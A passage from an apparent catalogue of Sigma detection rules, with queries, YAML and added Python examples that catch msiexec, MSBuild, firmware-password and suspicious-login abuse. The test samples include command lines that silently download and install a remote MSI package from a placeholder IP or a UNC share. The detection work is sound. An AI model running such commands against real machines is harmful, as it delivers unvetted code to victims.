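EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
OFFICE_RECENT = r"C:\Users\u\AppData\Roaming\Microsoft\Office\Recent\budget.xlsx.lnk"
# Constructed events (made up for this example).
SAMPLES = [
    FileEvent(EXPLORER, r"C:\Users\u\Downloads\Invoice_2024.pdf.lnk"),                   # fires
    FileEvent(EXPLORER, r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Recent\report.docx.lnk"),  # filter_main_recent
    FileEvent(EXCEL, OFFICE_RECENT),                                                     # Office MRU, written by Excel
    FileEvent(r"C:\Users\u\AppData\Local\Temp\dropper.exe", OFFICE_RECENT),              # same path, not Office: fires
    FileEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Users\u\Desktop\photo.jpg.lnk"),  # fires
    FileEvent(EXPLORER, r"C:\Users\u\Desktop\notes.txt.lnk"),                            # .txt. not in the list
    FileEvent(WINWORD, r"C:\Users\u\AppData\Roaming\Microsoft\Word\resume.docx.lnk"),    # filter_optional_office_word
]

if __name__ == "__main__":
    for ev, hit in zip(SAMPLES, evaluate(SAMPLES)):
        print(f"{'ALERT' if hit else '  -  '} {ev.image} -> {ev.target_filename}")
```

Events 4 and 5 are the ones to note: the dropper writing into the Office Recent folder is not excused by the Office filter, and a shortcut dropped by rundll32.exe on the Desktop has no filter at all.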
medium Moderate Medium FP
Suspicious Log Entries
Detects suspicious log entries in Linux log files
status test author Florian Roth (Nextron Systems) ATT&CK tactic-only id f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1
carbon_black query
"entered\ promiscuous\ mode" OR "Deactivating\ service" OR "Oversized\ packet\ received\ from" OR "imuxsock\ begins\ to\ drop\ messages"
view Sigma YAML
title: Suspicious Log Entries
id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1
status: test
description: Detects suspicious log entries in Linux log files
references:
    - https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml
author: Florian Roth (Nextron Systems)
date: 2017-03-25
modified: 2021-11-27
tags:
    - attack.impact
logsource:
    product: linux
detection:
    keywords:
        # Generic suspicious log lines
        - 'entered promiscuous mode'
        # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml
        - 'Deactivating service'
        - 'Oversized packet received from'
        - 'imuxsock begins to drop messages'
    condition: keywords
falsepositives:
    - Unknown
level: medium
medium Moderate Low FP
Suspicious Login Activity Classified By Google
Detects Google Workspace login activity that's classified as suspicious by Google.
status experimental author Tom Kluter ATT&CK sub-technique id 38360161-76c4-4283-842e-efcf997dafc8
carbon_black query
"protoPayload.Servicename":login.googleapis.com ("protoPayload.metadata.event.eventName":suspicious_login_less_secure_app OR "protoPayload.metadata.event.eventName":suspicious_login OR "protoPayload.metadata.event.eventName":suspicious_programmatic_login)
view Sigma YAML
title: Suspicious Login Activity Classified By Google
id: 38360161-76c4-4283-842e-efcf997dafc8
status: experimental
description: Detects Google Workspace login activity that's classified as suspicious by Google.
references:
    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging
    - https://cloud.google.com/logging/docs/audit/understanding-audit-logs
    - https://developers.google.com/workspace/admin/reports/v1/appendix/activity/login#suspicious_login
    - https://developers.google.com/workspace/admin/reports/v1/appendix/activity/login#suspicious_login_less_secure_app
    - https://developers.google.com/workspace/admin/reports/v1/appendix/activity/login#suspicious_programmatic_login
author: Tom Kluter
date: 2026-04-28
tags:
    - attack.initial-access
    - attack.privilege-escalation
    - attack.persistence
    - attack.stealth
    - attack.t1078.004
logsource:
    product: gcp
    service: google_workspace.login
detection:
    selection:
        protoPayload.Servicename: 'login.googleapis.com'
        protoPayload.metadata.event.eventName:
            - 'suspicious_login_less_secure_app'
            - 'suspicious_login'
            - 'suspicious_programmatic_login'
    condition: selection
falsepositives:
    - Legitimate logins
level: medium
medium Strong Medium FP
Suspicious MacOS Firmware Activity
Detects manipulation of the firmware password on macOS via firmwarepasswd. Note: this command is not supported on Apple silicon Macs.
status test author Austin Songer @austinsonger ATT&CK tactic-only id 7ed2c9f7-c59d-4c82-a7e2-f859aa676099
carbon_black query
Image:\/usr\/sbin\/firmwarepasswd (CommandLine:setpasswd* OR CommandLine:full* OR CommandLine:delete* OR CommandLine:check*)
view Sigma YAML
title: Suspicious MacOS Firmware Activity
id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099
status: test
description: Detects manipulation of the firmware password on macOS via firmwarepasswd. Note - this command is not supported on Apple silicon Macs.
references:
    - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml
    - https://www.manpagez.com/man/8/firmwarepasswd/
    - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web
author: Austin Songer @austinsonger
date: 2021-09-30
modified: 2022-10-09
tags:
    - attack.impact
logsource:
    category: process_creation
    product: macos
detection:
    selection1:
        Image: '/usr/sbin/firmwarepasswd'
        CommandLine|contains:
            - 'setpasswd'
            - 'full'
            - 'delete'
            - 'check'
    condition: selection1
falsepositives:
    - Legitimate administration activities
level: medium
medium Moderate Medium FP
Suspicious Msbuild Execution By Uncommon Parent Process
Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process
status test author frack113 ATT&CK tactic-only id 33be4333-2c6b-44f4-ae28-102cdbde0a31
carbon_black query
(Image:\\MSBuild.exe OR OriginalFileName:MSBuild.exe) (-(ParentImage:\\devenv.exe OR ParentImage:\\cmd.exe OR ParentImage:\\msbuild.exe OR ParentImage:\\python.exe OR ParentImage:\\explorer.exe OR ParentImage:\\nuget.exe))
view Sigma YAML
title: Suspicious Msbuild Execution By Uncommon Parent Process
id: 33be4333-2c6b-44f4-ae28-102cdbde0a31
status: test
description: Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process
references:
    - https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/
    - https://www.echotrail.io/insights/search/msbuild.exe
author: frack113
date: 2022-11-17
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\MSBuild.exe'
        - OriginalFileName: 'MSBuild.exe'
    filter_parent:
        ParentImage|endswith:
            - '\devenv.exe'
            - '\cmd.exe'
            - '\msbuild.exe'
            - '\python.exe'
            - '\explorer.exe'
            - '\nuget.exe'
    condition: selection and not filter_parent
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious MsiExec Embedding Parent
Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
status test author frack113 ATT&CK sub-technique id 4a2a2c3e-209f-4d01-b513-4155a540b469
carbon_black query
((Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\cmd.exe) (ParentCommandLine:MsiExec.exe* ParentCommandLine:\-Embedding\ *)) (-((Image:\:\\Windows\\System32\\cmd.exe CommandLine:C\:\\Program\ Files\\SplunkUniversalForwarder\\bin\\*) OR (CommandLine:\\DismFoDInstall.cmd* OR (ParentCommandLine:\\MsiExec.exe\ \-Embedding\ * ParentCommandLine:Global\\MSI0000*))))
view Sigma YAML
title: Suspicious MsiExec Embedding Parent
id: 4a2a2c3e-209f-4d01-b513-4155a540b469
status: test
description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-16
modified: 2022-07-14
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        ParentCommandLine|contains|all:
            - 'MsiExec.exe'
            - '-Embedding '
    filter_splunk_ufw:
        Image|endswith: ':\Windows\System32\cmd.exe'
        CommandLine|contains: 'C:\Program Files\SplunkUniversalForwarder\bin\'
    filter_vs:
        - CommandLine|contains: '\DismFoDInstall.cmd'
        - ParentCommandLine|contains|all:
              - '\MsiExec.exe -Embedding '
              - 'Global\MSI0000'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Suspicious Msiexec Execute Arbitrary DLL
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
status test author frack113 ATT&CK sub-technique id 6f4191bb-912b-48a8-9ce7-682769541e6d
carbon_black query
(Image:\\msiexec.exe (CommandLine:\ \-Y* OR CommandLine:\ \/Y* OR CommandLine:\ –Y* OR CommandLine:\ —Y* OR CommandLine:\ ―Y*)) (-(CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Program\ Files\\* OR CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Program\ Files\ \(x86\)\\* OR CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Windows\\System32\\* OR CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Windows\\SysWOW64\\*))
view Sigma YAML
title: Suspicious Msiexec Execute Arbitrary DLL
id: 6f4191bb-912b-48a8-9ce7-682769541e6d
status: test
description: |
    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://twitter.com/_st0pp3r_/status/1583914515996897281
author: frack113
date: 2022-01-16
modified: 2026-01-09
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msiexec.exe'
        CommandLine|contains|windash: ' /Y'
    filter_main_legit_path:
        CommandLine|contains:
            - '\MsiExec.exe" /Y "C:\Program Files\'
            - '\MsiExec.exe" /Y "C:\Program Files (x86)\'
            - '\MsiExec.exe" /Y "C:\Windows\System32\'
            - '\MsiExec.exe" /Y "C:\Windows\SysWOW64\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate script
level: medium
medium Strong Medium FP
Suspicious Msiexec Quiet Install From Remote Location
Detects quiet (/q) Msiexec.exe installs of packages hosted on a remote location (HTTP URL or UNC path)
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 8150732a-0c9d-4a99-82b9-9efb9b90c40c
carbon_black query
((Image:\\msiexec.exe OR OriginalFileName:msiexec.exe) (CommandLine:\-i* OR CommandLine:\/i* OR CommandLine:–i* OR CommandLine:—i* OR CommandLine:―i* OR CommandLine:\-package* OR CommandLine:\/package* OR CommandLine:–package* OR CommandLine:—package* OR CommandLine:―package* OR CommandLine:\-a* OR CommandLine:\/a* OR CommandLine:–a* OR CommandLine:—a* OR CommandLine:―a* OR CommandLine:\-j* OR CommandLine:\/j* OR CommandLine:–j* OR CommandLine:—j* OR CommandLine:―j*) (CommandLine:\-q* OR CommandLine:\/q* OR CommandLine:–q* OR CommandLine:—q* OR CommandLine:―q*) (CommandLine:http* OR CommandLine:\\\\*)) (-(CommandLine:\\AppData\\Local\\Temp\\OpenOffice* CommandLine:Installation\ Files\\openoffice*))
view Sigma YAML
title: Suspicious Msiexec Quiet Install From Remote Location
id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
related:
    - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
      type: similar
status: test
description: Detects quiet (/q) Msiexec.exe installs of packages hosted on a remote location (HTTP URL or UNC path)
references:
    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-28
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: 'msiexec.exe'
    selection_cli:
        # Note that there is no space before and after the arguments because it's possible to write a commandline as such
        # Example: msiexec -q/i [MSI Package]
        CommandLine|contains|windash:
            - '-i'
            - '-package'
            - '-a'
            - '-j'
    selection_quiet:
        CommandLine|contains|windash: '-q'
    selection_remote:
        CommandLine|contains:
            - 'http'
            - '\\\\'
    filter_optional_openoffice:
        CommandLine|contains|all:
            - '\AppData\Local\Temp\OpenOffice'
            - 'Installation Files\openoffice'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
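The |windash modifier is what makes this rule robust against switch spelling: the rendered query expands each flag into the '-', '/', en dash, em dash and horizontal bar forms, and the rule deliberately omits surrounding spaces so that run-together syntax such as "msiexec -q/i pkg" is still caught. The following is an added example, not code from the Sigma project or from this page, that implements windash as dash normalisation and runs the full rule, OpenOffice filter included, over constructed command lines. The renamed-binary case relies on the OriginalFileName branch of selection_img; the OpenOffice command line is a constructed approximation of that false positive.

```python
# Added example: "Suspicious Msiexec Quiet Install From Remote Location" with
# the Sigma |windash modifier implemented as dash normalisation.
WINDASH_VARIANTS = "/\u2013\u2014\u2015"  # slash, en dash, em dash, horizontal bar
_DASH_TABLE = {ord(ch): "-" for ch in WINDASH_VARIANTS}


def windash_normalize(cmdline: str) -> str:
    """Fold every dash variant windash expands to into '-', so a single
    substring test covers /q, -q, \u2013q, \u2014q and \u2015q alike."""
    return cmdline.translate(_DASH_TABLE)


INSTALL_FLAGS = ("-i", "-package", "-a", "-j")   # selection_cli, after normalisation
QUIET_FLAG = "-q"                                # selection_quiet
REMOTE_MARKERS = ("http", "\\\\")                # selection_remote: URL scheme or UNC prefix


def rule_matches(image: str, cmdline: str, original_file_name: str = "") -> bool:
    """condition: all of selection_* and not 1 of filter_optional_*"""
    img = image.lower()
    if not (img.endswith("\\msiexec.exe") or original_file_name.lower() == "msiexec.exe"):
        return False
    cl = windash_normalize(cmdline.lower())
    # No surrounding spaces on the flags: "msiexec -q/i pkg" is valid syntax.
    if not any(flag in cl for flag in INSTALL_FLAGS):
        return False
    if QUIET_FLAG not in cl:
        return False
    if not any(marker in cl for marker in REMOTE_MARKERS):
        return False
    # filter_optional_openoffice
    if "\\appdata\\local\\temp\\openoffice" in cl and "installation files\\openoffice" in cl:
        return False
    return True


MSIEXEC = r"C:\Windows\System32\msiexec.exe"
# Constructed command lines (made up for this example).
SAMPLES = [
    (MSIEXEC, "msiexec.exe /q /i http://203.0.113.10/setup.msi"),
    (MSIEXEC, r"msiexec -q/i \\fileserver\share\tool.msi"),               # run-together switches, UNC source
    (MSIEXEC, "msiexec.exe \u2014q \u2014i https://203.0.113.10/x.msi"),   # em dashes
    (MSIEXEC, r'msiexec.exe /i "\\?\C:\Users\u\AppData\Local\Temp\OpenOffice 4.1.14 Installation Files\openoffice41414.msi" /qb'),  # filtered
    (MSIEXEC, r"msiexec.exe /i C:\pkg\app.msi /qn"),                         # local package
    (MSIEXEC, r"msiexec.exe /x C:\pkg\app.msi /qn"),                         # uninstall, no install flag
]

if __name__ == "__main__":
    for image, cmdline in SAMPLES:
        print(f"{'ALERT' if rule_matches(image, cmdline) else '  -  '} {cmdline}")
    # A copy of msiexec.exe renamed to x.exe still carries OriginalFileName=msiexec.exe
    print(rule_matches(r"C:\Temp\x.exe", SAMPLES[0][1], original_file_name="msiexec.exe"))
```

One side effect of the rule's spaceless flags is worth knowing before tuning: after windash expansion "/i" also matches a path component such as "/i.msi" in a URL, and "-a" matches the dash-plus-hex sequence inside many GUIDs, so the remote-source condition is doing most of the work in keeping the alert volume down.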
Showing 1151-1200 of 1,440